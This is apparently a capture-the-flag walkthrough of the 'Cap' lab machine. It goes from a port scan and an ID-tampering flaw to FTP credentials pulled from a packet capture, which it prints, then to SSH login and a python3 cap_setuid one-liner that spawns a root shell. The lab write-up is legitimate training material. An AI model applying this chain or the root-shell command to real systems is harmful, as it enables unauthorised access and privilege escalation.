🟢Cap
OS: Linux
Difficulty: Easy
Port Scanning
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 3.0.3
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack gunicornchecking out the website
Now we know that this site is used for network monitoring and that there is a user named Nathan.
Checking out "Security Snapshot"
This option redirects us to /data/1 where no traffic is logged. I changed it to /data/0 and here we see that there is some recorded traffic.
I clicked to download and got a file called 0.pcap so I opened it with wireshark.
User
In this file, we can see a lot of important information. We see that the user made http requests to the site. We see some TCP requests. But the main thing is that we see some FTP requests, where we can get Nathan's username and password on the FTP server.
Sorting the requests by protocol and navigating to the end of the file we find this information.
user: nathan
password: Buck3tH4TF0RM3!
We can download the user flag running
get user.txt
We can also use these credentials to log in in ssh.
ssh nathan@<box_ip>
password: Buck3tH4TF0RM3!
Privesc
After some simple enumerations, I saw that the file /var/www/html/app.py had a line written "os.setuid(1000)". That led me to enumerate the binaries with capabilities to change their own uid to 0 (from root)
getcap -r / 2>/dev/null
nathan@cap:~$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+epWe see that python3 is allowed to change its own uid. We can make a program that changes its uid and run a shell as root.
python3 -c 'import os;os.setuid(0);os.system("bash")'
Helpful links:
Web
User
Privesc
Last updated